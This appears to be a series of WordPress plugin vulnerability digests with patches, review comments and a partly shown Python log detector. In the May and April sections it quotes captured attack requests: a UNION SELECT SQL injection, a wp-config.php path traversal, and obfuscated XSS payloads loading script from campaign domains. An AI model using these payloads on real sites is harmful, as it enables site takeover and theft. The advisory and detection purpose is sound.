Vulnerable Plugins: June 2020 Update

This is a mid-month update to our regular Monthly Vulnerability Digest, covering a number of new patches for disclosed vulnerabilities.

| Plugin | Vulnerability | Patched Version | Installs |
|---|---|---|---|
| Elementor Page Builder | Authenticated Stored XSS | 2.9.10 | 5000000 |
| AdRotate | Authenticated SQL Injection | 5.8.4 | 40000 |
| Brizy - Page Builder | Improper Access Controls | 1.0.126 | 60000 |
| Careerfy | Unauthenticated XSS | 3.9.0 | 5000 |
| SportsPress | Authenticated Stored XSS | 2.7.2 | 20000 |
| JobSearch | Unauthenticated XSS | 1.5.1 | 5000 |
| Newspaper | Unauthenticated XSS | 10.3.4 | 6000 |
| Multi Scheduler | Record Deletion CSRF | -- | 20 |

Highlights

  • Cross-site scripting is the most common vulnerability in WordPress plugins
  • None of these plugins have been identified in massive attacks

Relevant Plugins

SportsPress

SportsPress fixed an authenticated stored cross-site scripting vulnerability in version 2.7.2. The vulnerability allows authenticated attackers to write arbitrary content into the “sportspress_event_teams_delimiter” plugin option, so that a malicious script can execute every time the site is loaded.

Since this bug is easy for attackers to exploit in malware campaigns, we have been following it closely, but we haven’t detected any massive abuse of it as an attack vector. We believe this is primarily because exploitation requires access to a compromised user account on the vulnerable site.

Patch:

Index: sportspress/tags/2.7.2/includes/admin/settings/class-sp-settings-events.php
===================================================================
--- a/sportspress/tags/2.7.2/includes/admin/settings/class-sp-settings-events.php
+++ b/sportspress/tags/2.7.2/includes/admin/settings/class-sp-settings-events.php         
         if ( isset( $_POST['sportspress_event_teams_delimiter'] ) )
-            update_option( 'sportspress_event_teams_delimiter', $_POST['sportspress_event_teams_delimiter'] );
+            update_option( 'sportspress_event_teams_delimiter', sanitize_text_field( $_POST['sportspress_event_teams_delimiter'] ) );
 }
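
Review bot: sanitize_text_field() on the `sportspress_event_teams_delimiter` value strips tags at the point of storage, which is what closes the stored XSS, but the option is still printed on every page load, so the code that outputs it should also escape for its context (esc_html() or esc_attr()); that way a value that reached the database by any other path (a direct edit, an older import) cannot execute either. The hunk also shows no capability or nonce check around the `$_POST` read; if that check lives in the surrounding settings handler this is fine, otherwise `update_option` here is reachable by anyone who can submit the form.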

AdRotate

AdRotate fixed an authenticated SQL injection in version 5.8.4. We haven’t detected any massive automated attacks targeting this plugin.

Patch:

    if(isset($_GET['status'])) $status = esc_attr($_GET['status']);
     if(isset($_GET['view'])) $view = esc_attr($_GET['view']);
     if(isset($_GET['id'])) $id = esc_attr($_GET['id']);
     if(isset($_GET['file'])) $file = esc_attr($_GET['file']);
+
+    if(!is_numeric($status)) $status = 0;
+    if(!is_numeric($id)) $id = 0;
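
Review bot: the two `is_numeric()` fallbacks are the actual SQL fix; `esc_attr()` on the four `$_GET` values is HTML-attribute escaping and does nothing against SQL. `is_numeric()` still accepts strings such as `1e3`, leading whitespace, signs and floats, so if `$status` and `$id` are interpolated into a query, `absint( $_GET['id'] )` (or an `(int)` cast) together with `$wpdb->prepare()` is the tighter choice. `$view` and `$file` get no validation in this hunk; if either reaches a query or a filesystem call it needs the same treatment.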

The majority of the public vulnerabilities in this mid-month update require the possession of a user account within the vulnerable site, which reduces the odds of any massive infections.

That being said, to mitigate risk from these recently patched vulnerabilities we strongly encourage all affected users to update their plugins as soon as possible.

Vulnerabilities Digest: May 2020

Relevant Plugins and Vulnerabilities:

| Plugin | Vulnerability | Patched Version | Installs |
|---|---|---|---|
| WP Product Review | Unauthenticated Stored XSS | 3.7.6 | 40000 |
| Form Maker by 10Web | Authenticated SQL Injection | --- | 100000 |
| Add-on SweetAlert Contact Form 7 | Authenticated XSS | 1.0.8 | 20 |
| Paid Memberships Pro | Authenticated SQL Injection | 2.3.3 | 90000 |
| Visual Composer | Authenticated XSS | 27 | 80000 |
| Team Members | Authenticated XSS | 5.0.4 | 40000 |
| Photo Gallery by 10Web | Unauthenticated SQL Injection | 1.5.55 | 300000 |
| Login/Signup Popup | Authenticated XSS | 1.5 | 10000 |
| Easy Testimonials | Authenticated Stored XSS | 3.6 | 30000 |
| WooCommerce | Unescaped Metadata | 4.1.0 | 5000000 |
| Page Builder by SiteOrigin | CSRF to XSS | 2.10.16 | 1000000 |
| Chopslider | Authenticated SQL Injection | --- | 200 |
| Elementor Pro | Authenticated File Upload | 2.9.4 | 100000 |
| LearnPress | Privilege Escalation | 3.2.6.9 | 80000 |
| Elementor | Authenticated Stored XSS | 2.9.8 | 4000000 |
| Avada | Authenticated Stored XSS | 6.2.3 | 500000 |
| Ninja Forms | CSRF to Stored XSS | 3.4.24.2 | 1000000 |
| Advanced Order Export For Woo | Authenticated XSS | 3.1.4 | 90000 |
| Quick Page/Post redirect | Authenticated Settings Update | --- | 100000 |
| Ultimate Addons for Elementor | Registration Bypass | 1.24.2 | 100000 |
| WTI Like Post | Authenticated XSS | --- | 10000 |
| WP-Advanced-Search | Authenticated SQL Injection | 3.3.7 | 1000 |
| Gmedia Photo Gallery | Authenticated XSS | 1.18.5 | 10000 |

Highlights for May 2020

  • Cross site scripting is still the most prevalent vulnerability. Bad actors are taking advantage of the lack of restrictions in critical functions and issues surrounding user input data sanitization.
  • Unprotected AJAX action bugs are still on the rise. Attackers aren’t hesitating to automate malicious injections for vulnerable plugins.
  • Attackers have added three plugins and a series of new malicious IPs to their arsenal in an ongoing massive malware campaign targeting WordPress websites with known vulnerabilities.

Details for these highlights can be found under the components listed below.

WP Product Review

Two weeks ago, we reported an unauthenticated stored cross-site scripting vulnerability in WP Product Review, caused by a lack of protection on a REST route definition and improper handling of user input.

Only a few days after the disclosure of this vulnerability, attackers began to scan for vulnerable sites:

181.58.21.65 - - [18/May/2020:17:21:10 +0000] "GET //wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1"

139.198.16.241 - - [18/May/2020:17:15:36 +0000] "GET //wp-content/plugins/wp-product-review/readme.txt HTTP/1.1" 

185.162.127.248 - - [17/May/2020:03:38:15 +0000] "GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1" 

213.159.210.170 - - [17/May/2020:01:35:04 +0000] "GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1" 

Patch (version 3.7.6):

Index: wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php
===================================================================
--- a/wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php
+++ b/wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php
@@ -97,4 +97,7 @@
                 'methods'  => 'POST',
                 'callback' => array( $this, 'update_review_callback' ),
+                'permission_callback' => function () {
+                    return current_user_can( 'edit_posts' );
+                },
                 'args'     => array(
                     'id' => array(
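
Review bot: adding `permission_callback` is the right fix for the open route, but `current_user_can( 'edit_posts' )` only checks a global capability, while the callback updates a review identified by the `id` argument declared just below. The closure receives the `WP_REST_Request` object, so checking `current_user_can( 'edit_post', $request['id'] )` inside it ties the permission to the specific post rather than to any user who can edit posts at all.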

---

Index: wp-product-review/trunk/includes/functions.php
===================================================================
--- a/wp-product-review/trunk/includes/functions.php
+++ b/wp-product-review/trunk/includes/functions.php
@@ -229,5 +229,5 @@
         }
         ?>
-        <a title="<?php echo $review_object->get_name(); ?>" class="<?php echo $class_a; ?>" href="<?php echo esc_url( $image_link ); ?>" <?php echo $lightbox; ?> rel="nofollow" target="_blank">
+        <a title="<?php echo esc_attr( $review_object->get_name() ); ?>" class="<?php echo $class_a; ?>" href="<?php echo esc_url( $image_link ); ?>" <?php echo $lightbox; ?> rel="nofollow" target="_blank">
             <img
                 src="<?php echo esc_attr( $src ); ?>"
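
Review bot: `esc_attr()` on `$review_object->get_name()` fixes the attribute-context escape on `title`, but `$class_a` and `$lightbox` in the same `<a>` tag are still echoed raw. Unless both are built only from literal strings, `$class_a` should go through `esc_attr()` as well, and `$lightbox` should be assembled from escaped parts instead of being printed as a preformatted attribute string.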

Elementor

Earlier this month, the plugin Elementor Pro fixed an arbitrary file upload vulnerability caused by an unprotected Ajax hook. It wasn’t long before attackers started exploiting this vulnerability.

Our team identified these malicious IPs trying to detect plugin installations for both Elementor Pro and Ultimate Addons for Elementor:

69.164.207.140 - - [08/May/2020:15:59:31 +0000] "GET /wp-content/plugins/elementor-pro/assets/js/preview.min.js HTTP/1.1" 

45.79.193.100 - - [08/May/2020:16:49:13 +0000] "GET /wp-content/plugins/ultimate-elementor/assets/css/modules/business-hours.css HTTP/1.1" 

62.210.172.66 - - [10/May/2020:02:33:29 +0000] "GET /wp-content/plugins/ultimate-elementor/assets/min-js/uael-registration.min.js HTTP/1.1" 

62.210.84.69 - - [13/May/2020:08:13:57 +0000] "GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1" 

62.210.172.66 - - [13/May/2020:08:21:05 +0000] "GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1" 

[...]

Photo Gallery by 10Web

An unauthenticated SQL Injection was fixed this month in the plugin Photo Gallery.

Patch (version 1.5.55):

Index: photo-gallery/trunk/frontend/models/model.php
===================================================================
--- a/photo-gallery/trunk/frontend/models/model.php
+++ b/photo-gallery/trunk/frontend/models/model.php
@@ -197,32 +197,32 @@

   public function get_alb_gals_row( $bwg, $id, $albums_per_page, $sort_by, $order_by, $pagination_type = 0, $from = '' ) {
-    if ( $albums_per_page < 0 ) {
+    if ( $albums_per_page < 0 ) {
       $albums_per_page = 0;
     }
     global $wpdb;
-    $order_by = 'ORDER BY ' . ( (!empty($from) && $from === 'widget') ? 'id' : $sort_by ) . ' ' . $order_by;
-    if( $sort_by == 'random' || $sort_by == 'RAND()' ) {
-      $order_by = 'ORDER BY RAND()';
-    }
-    $search_where = '';
-    $search_value = trim( WDWLibrary::get('bwg_search_' . $bwg) );
-    if ( !empty($search_value) ) {
-      $search_keys = explode(' ', $search_value);
+    $order_by = 'ORDER BY ' . ( ( !empty( $from ) && $from === 'widget' ) ? 'id' : $sort_by ) . ' ' . $order_by;
+    if ( $sort_by == 'random' || $sort_by == 'RAND()' ) {
+      $order_by = 'ORDER BY RAND()';
+    }
+    $search_where = '';
+    $search_value = trim( WDWLibrary::get( 'bwg_search_' . $bwg ) );
+    if ( !empty( $search_value ) ) {
+      $search_keys = explode( ' ', $search_value );
       $alt_search = '(';
       $description_search = '(';
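
Review bot: as shown, the `-` and `+` lines of this hunk differ only in spacing inside `empty( $from )`, `WDWLibrary::get( ... )` and `explode( ... )`; `$sort_by` and `$order_by` are still concatenated straight into the `ORDER BY` clause, and `$search_value` is still split into `$search_keys` with no escaping visible here. The `@@ -197,32 +197,32 @@` header covers more lines than are reproduced, so the actual fix for the injection must sit in the omitted part of the function; a reviewer would want to see the whitelist applied to `$sort_by`/`$order_by` and the `esc_sql()` or `$wpdb->prepare()` treatment of the search terms before accepting the patch as complete.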

Payload Used by Attackers:

185.162.127.248 -- POST -- /wp-admin/admin-ajax.php -- action=bwg_frontend_data&bwg_search_0=1%23+%25DFGDFG%22%29%29%2F%2A%2A%2FUNION%2F%2A%2A%2FALL%2F%2A%2A%2FSELECT%2F%2A%2A%2FTABLE_SCHEMA%2CTABLE_NAME%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2F%2A%2A%2Fas%2F%2A%2A%2Fdummy_3%2F%2A%2A%2Ffrom%2F%2A%2A%2Finformation_schema.tables%23FGDFGDFG%29%29%23&gallery_type=album_compact_preview&type_0=album -- 2020-05-17

Plugin & Theme Payloads Added to Ongoing Campaign

Malicious Domains & Detected IPs

Our team saw the following new malicious domains injected into an ongoing campaign exploiting known WordPress vulnerabilities this month:

css[.]digestcolect[.]com
cls[.]balantfromsun[.]com
count[.]trackstatisticsss[.]com

The following IPs have also been associated with this campaign:

Exploit Attempts Seen in the Wild

Our team identified attacks against the following vulnerable plugins and themes.

Bold Page Builder (From Last Year)
139.162.28.41 -- POST -- /wp-admin/admin-ajax.php?action=bt_bb_set_custom_css -- css=%3C%2Fstyle%3E%3Cscript++type%3Dtext%2Fjavascript+language%3Djavascript%3Eeval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%2C101%2C109%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C10%2C9%2C101%2C108%2C101%2C109%2C46%2C116%2C121%2C112%2C101%2C32%2C61%2C32%2C39%2C116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C59%2C32%2C10%2C32%2C32%2C32%2C32%2C101%2C108%2C101%2C109%2C46%2C115%2C114%2C99%2C32%2C61%2C32%2C39%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C99%2C108%2C115%2C46%2C98%2C97%2C108%2C97%2C110%2C116%2C102%2C114%2C111%2C109%2C115%2C117%2C110%2C46%2C99%2C111%2C109%2C47%2C99%2C108%2C115%2C46%2C106%2C115%2C63%2C122%2C61%2C54%2C38%2C39%2C59%2C10%2C32%2C32%2C32%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C34%2C104%2C101%2C97%2C100%2C34%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3B%3C%2Fscript%3E%3Cstyle%3E&post_id=1 -- 2020-05-12
WP Quick Booking Manager (from 4 years ago)
139.162.28.41 - action=gen_save_cssfixfront&css=%3C%2Fstyle%3E%3Cscript+type%3D%27text%2Fjavascript%27+src%3D%27https%3A%2F%2Fcss.digestcolect.com%2Fstm%3Fv%3Dl6.0.0%27%3E%3C%2Fscript%3E%3Cstyle%3E&cssfix=front [12/May/2020:04:52:19 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 
Duplicator Download
62.210.180.8 - - [14/May/2020:14:45:54 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1" 

Many other plugins are still under attack, and public exploits already exist for all of the components listed above. Please check our previous lab notes for more information about this ongoing WordPress malware campaign.

To mitigate this threat, we strongly encourage you to keep your software up to date to prevent infection and reduce risk to your environment. Websites behind the Sucuri Firewall are protected against these exploits.

Unauthenticated Stored Cross Site Scripting in WP Product...

Exploitation Level: Very Easy / Remote

DREAD Score: 7.4

Vulnerability: Persistent Cross-site Scripting

Patched Version: 3.7.6

During a routine research audit for our Sucuri Firewall, we discovered an Unauthenticated Persistent Cross-Site Scripting (XSS) affecting 40,000+ users of the WP Product Review plugin.

Current State of the Vulnerability

Though this security bug was fixed in the 3.7.6 release, older versions can be exploited by an attacker without any account in the vulnerable site. We are not aware of any exploit attempts currently using this vulnerability.

Disclosure / Response Timeline:

  • May 13, 2020: Initial contact.
  • May 14, 2020: Patch is live.

Technical Details

All user input is sanitized, but the WordPress function used for it can be bypassed when the value is placed inside an HTML attribute. A successful attack results in malicious scripts being injected into all of the site’s products.

Update as Soon as Possible

Unauthenticated attacks are very serious because they can be automated, making it easy for hackers to mount successful, widespread attacks against vulnerable websites. The number of active installs, the ease of exploitation, and the effects of a successful attack are what makes this vulnerability particularly dangerous.

To protect against this vulnerability, we strongly encourage WP Product Review users to update their plugin to version 3.7.6 as soon as possible. Users that are unable to update immediately can leverage the Sucuri Firewall or equivalent technology to virtually patch the vulnerability.

Vulnerabilities Digest: April 2020

Relevant Plugins and Vulnerabilities:

| Plugin | Vulnerability | Patched Version | Installs |
|---|---|---|---|
| Widget Settings Importer/Exporter | Stored XSS | Closed | 40000 |
| Accordion | Stored/Reflected XSS | 2.2.9 | 30000 |
| Support Ticket System By Phoeniixx | Reflected XSS | Closed | 2000 |
| Gutenberg Blocks | Authenticated Settings Change | 1.14.8 | 200000 |
| WP Lead Plus X | Stored XSS | 0.99 | 70000 |
| OneTone | Stored XSS | Closed | 20000 |
| WP Advanced Search | SQL Injection | 3.3.6 | 1000 |
| Easy Forms for Mailchimp | Authenticated XSS | 6.6.3 | 100000 |
| CM Pop-Up banners | Stored XSS | 1.4.11 | 10000 |
| Duplicate Page and Post | SQL Injection | 2.5.8 | 50000 |
| WP post page close | SQL Injection | Closed | ---- |

Highlights for April 2020

  • Developers are still falling short when sanitizing user input, leading to the exploitation of vulnerable third-party components.
  • Cross site scripting is still the most prevalent vulnerability. Bad actors are taking advantage of the lack of restrictions in critical functions and issues surrounding user input data sanitization.
  • Unprotected AJAX action bugs are still on the rise. Attackers aren’t hesitating to automate malicious injections for vulnerable plugins.
  • Access bypass bugs continue to be the most critical vulnerability.
  • We saw a spike in attempts to exploit old Magento vulnerabilities.

Details for these highlights can be found under the components listed below.

WP-Advanced-Search

Developers fixed an unauthenticated SQL injection in WP-Advanced-Search caused by improper handling of user input.

Public PoC:

GET /wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_autosuggest&f=[malicious payload] 

Patch (version 3.6):

Developers removed the “autocompletion-PHP5.5.php” file and added restrictions to multiple SQL queries.

--- a/wp-advanced-search.old/class.inc/autocompletion/autocompletion-PHP5.5.php
+++ /dev/null
@@ -1,58 +0,0 @@
-<?php
-if(isset($_GET['q']) && !empty($_GET['q'])) {
-       $query = htmlspecialchars(stripslashes($_GET['q']));
-
-       // Récupération à la volée des informations transmises par le script d'autocomplétion
-       $table   = htmlspecialchars($_GET['t']);
-       $field   = htmlspecialchars($_GET['f']);
-       $type    = htmlspecialchars($_GET['type']);
-       $encode  = htmlspecialchars($_GET['e']);
[...]
-    // Requête de recherche dans l'index inversé (base de mots clés auto-générés)
-    // $requeteSQL = "SELECT DISTINCT ".$field." FROM ".$table." WHERE ".$field." LIKE '".$arg.$link->real_escape_string($query)."%' ORDER BY ".$field." ASC, idindex DESC LIMIT 0 , ".$limitS."";
-    $requeteSQL = "SELECT ".$field." FROM ".$table." WHERE ".$field." LIKE '".$arg.$link->real_escape_string($query)."%' ORDER BY ".$field." ASC, idindex DESC";
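
Review bot: removing the file is the right call, and the visible lines show why: `$table` and `$field` come from `$_GET` through `htmlspecialchars()`, which is HTML encoding rather than SQL escaping, and are then concatenated into `$requeteSQL` as identifiers, while only `$query` goes through `real_escape_string()`. The lines shown also read `$_GET` at the top of the file with no WordPress bootstrap or capability check visible, which is what made the issue reachable without authentication; if equivalent autocomplete is reinstated it should go through admin-ajax or a REST route with a fixed whitelist for the table and field names.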

Support Ticket System By Phoeniixx

The plugin Support Ticket System By Phoeniixx was closed due to lack of maintenance, but existing users are still impacted by a reflected Cross Site Scripting vulnerability.

Public PoC:

GET  site.com/?view_id=[malicious payload] 

Vulnerable Code:

<script>

var newurl      = '<?php echo admin_url('admin-ajax.php') ;?>';                       
var get_val = '<?php echo (!empty($_GET['view_id']))?$_GET['view_id']:""; ?>';

</script>

Plugin & Theme Payloads Added to Ongoing Campaign

The Popup Builder plugin allows site owners to easily create promotional popups. This past month, versions below 3.64 were affected by an unauthenticated stored XSS, and attackers are still using it to infect thousands of sites.

Malicious domains injected this month

slow[.]destinyfernandi[.]com
ws[.]stivenfernando[.]com
stat[.]trackstatisticsss[.]com

Exploit Attempts Seen in the Wild

This past month, our team identified attacks against the following vulnerable plugins and themes.

OneTone theme (closed)
164.132.194.160 -- POST -- /wp-admin/admin-ajax.php -- action=onetone_options_import&options=%7B%22header_social_icons%22%3A%5B%5D%2C%22page_title_bar_background1%22%3A%7B%22background-color%22%3A%22%22%2C%22background[...]2C%22top_bar_info_content%22%3A%22%22%2C%22copyright%22%3A%22%3Cscript%3Eeval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,57,44,57,55,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,1
21,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125))%3B%3C%5C%2Fscript%3E%22%7D -- 2020-04-27
Popup Builder
185.212.128.162 -- POST -- /wp-admin/admin-ajax.php -- action=sgpb_autosave&allPopupData[...]%27on%27+%2B+eventName%2C+fn%29%3B%7D&allPopupData%5B92%5D%5Bname%5D=sgpb-WillOpen&allPopupData%5B92%5D%5Bvalue%5D=var+u+%3D+String.fromCharCode%28104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C119%2C115%2C46%2C115%2C116%2C105%2C118%2C101%2C110%2C102%2C101%2C114%2C110%2C97%2C110%2C100%2C111%2C46%2C99%2C111%2C109%2C47%2C115%2C116%2C109%2C63%2C118%2C61%2C46%2C49%2C119%2C115%2C51%2C46%2C49%2C46%2C56%2C46%2C49%2C46%2C49%29%3Bvar+d%3Ddocument%3Bvar+s%3Dd.createElement%28String.fromCharCode%28115%2C99%2C114%2C105%2C112%2C116%29%29%3B+s.type%3DString.fromCharCode%28116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%29%3B+var+pl+%3D+u%3B+s.src%3Dpl%3B+if+%28document.currentScript%29+%7B+document.currentScript.parentNode.insertBefore%28s%2C+document.currentScript%29%3B%7D+else+%7Bd.getElementsByTagName%28String.fromCharCode%28104%2C101%2C97%2C100%29%29%5B0%5D.appendChild%28s%29%3Bvar+list+%3D+document.getElementsByTagName%28String.fromCharCode%28115%2C99%2C114%2C105%2C112%2C116%29%29%3Blist.insertBefore%28s%2C+list.childNodes%5B0%5D%29%3B%7D&allPopupData%5B93%5D%5Bname%5D=sgpb-DidOpen&allPopupData%5B93%5D%5Bvalue%5D=+&allPopupData%5B94%5D%5Bname%5D=sgpb-ShouldClose&allPopupData%5B94%5D%5Bvalue%5D=var+u+%3D+String.fromCharCode%28104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C119%2C115%2C46%2C115%2C116%2C105%2C118%2C101%2C110%2C102%2C101%2C114%2C110%2C97%2C110%2C100%2C111%2C46%2C99%2C111%2C109%2C47%2C115%2C116%2C109%2C63%2C118%2C61%2C46%2C49%2C119%2C115%2C51%2C46%2C49%2C46%2C56%2C46%2C49%2C46%2C49%29%3Bvar+d%3Ddocument%3Bvar+s%3Dd.createElement%28String.fromCharCode%28115%2C99%2C114%2C105%2C112%2C116%29%29%3B+s.type%3DString.fromCharCode%28116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%29%3B+var+pl+%3D+u%3B+s.src%3Dpl%3B+if+%28document.currentScript%29+%7B+document.currentScript.parentNode.insertBefore%28s%2C+document.cu
rrentScript%29%3B%7D+else+%7Bd.getElementsByTagName%28String.fromCharCode%28104%2C101%2C97%2C100%29%29%5B0%5D.appendChild%28s%29%3Bvar+list+%3D+d[...]sgpb-css-editor&allPopupData%5B97%5D%5Bvalue%5D= 

Many other plugins are still under attack. Please check our previous lab notes for more information.
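
The exploit attempts listed in the May and April "Exploit Attempts Seen in the Wild" sections, together with the plugin-asset requests shown for WP Product Review and Elementor, share a few request shapes: fingerprinting of a plugin directory, admin-ajax calls to the abused actions, script or UNION/SELECT markers in parameters, and `../` in a `file` parameter. The Python below is an added example, not Sucuri's tooling: it parses both record formats used on this page and flags those shapes. The sample records are constructed (shortened payloads, RFC 5737 documentation addresses), and the action-to-plugin map only covers the actions named on this page.

```python
"""Flag the request shapes listed in the May and April digests (added example).

Two record formats appear on the page: Apache-style access-log lines and the
"IP -- METHOD -- target -- body -- date" form. Sample records below are
constructed (shortened payloads, RFC 5737 documentation IPs).
"""
import re
from urllib.parse import parse_qs, urlsplit

# Plugin directories whose static assets attackers request to fingerprint installs.
FINGERPRINT_PLUGINS = {"wp-product-review", "elementor-pro", "ultimate-elementor"}

# admin-ajax actions abused in the campaign, keyed to the plugin they belong to.
ABUSED_ACTIONS = {
    "bt_bb_set_custom_css": "Bold Page Builder",
    "gen_save_cssfixfront": "WP Quick Booking Manager",
    "duplicator_download": "Duplicator",
    "bwg_frontend_data": "Photo Gallery by 10Web",
    "onetone_options_import": "OneTone theme",
    "sgpb_autosave": "Popup Builder",
}

APACHE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)')
SUCURI_RE = re.compile(
    r'^(?P<ip>\S+) -- (?P<method>[A-Za-z]+) -- (?P<target>\S+) -- (?P<body>.*?) -- (?P<ts>\S+)$')

SCRIPT_RE = re.compile(r"<\s*/?\s*script|fromcharcode|\beval\s*\(", re.I)
SQL_RE = re.compile(r"\bunion\b.*\bselect\b|information_schema", re.I)


def parse_record(line):
    """Parse either record format into ip/method/path/params, or return None."""
    m = APACHE_RE.match(line) or SUCURI_RE.match(line)
    if not m:
        return None
    # Collapse the leading '//' seen in scanner requests so urlsplit does not
    # read 'wp-content' as a host name.
    target = re.sub(r"^/+", "/", m.group("target"))
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    body = m.groupdict().get("body") or ""
    if body and body != "-":
        for key, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    return {"ip": m.group("ip"), "method": m.group("method").upper(),
            "path": parts.path, "params": params}


def classify(rec):
    """Return the list of (tag, detail) findings for one parsed record."""
    findings = []
    path, params = rec["path"], rec["params"]
    m = re.match(r"^/wp-content/plugins/([^/]+)/", path)
    if m and m.group(1) in FINGERPRINT_PLUGINS:
        findings.append(("fingerprint", m.group(1)))
    if path.endswith("/wp-admin/admin-ajax.php"):
        for action in params.get("action", []):
            if action in ABUSED_ACTIONS:
                findings.append(("abused-action", action))
        # Decoded parameter values, inspected together for payload markers.
        flat = " ".join(f"{k}={v}" for k, vs in params.items() for v in vs)
        if SCRIPT_RE.search(flat):
            findings.append(("xss-payload", "script/eval in parameters"))
        if SQL_RE.search(flat):
            findings.append(("sqli-payload", "UNION/SELECT or information_schema"))
        for name in params.get("file", []):
            if ".." in name.replace("\\", "/").split("/"):
                findings.append(("path-traversal", name))
    return findings


def scan(lines):
    """Map the source IP of each suspicious record to its findings."""
    report = {}
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        hits = classify(rec)
        if hits:
            report.setdefault(rec["ip"], []).extend(hits)
    return report


SAMPLE_RECORDS = [  # constructed, not real traffic
    '203.0.113.10 - - [18/May/2020:17:21:10 +0000] "GET //wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1"',
    '203.0.113.11 - - [08/May/2020:15:59:31 +0000] "GET /wp-content/plugins/elementor-pro/assets/js/preview.min.js HTTP/1.1"',
    '203.0.113.12 -- POST -- /wp-admin/admin-ajax.php?action=bt_bb_set_custom_css -- css=%3C%2Fstyle%3E%3Cscript%3Eeval%28String.fromCharCode%2832%29%29%3C%2Fscript%3E&post_id=1 -- 2020-05-12',
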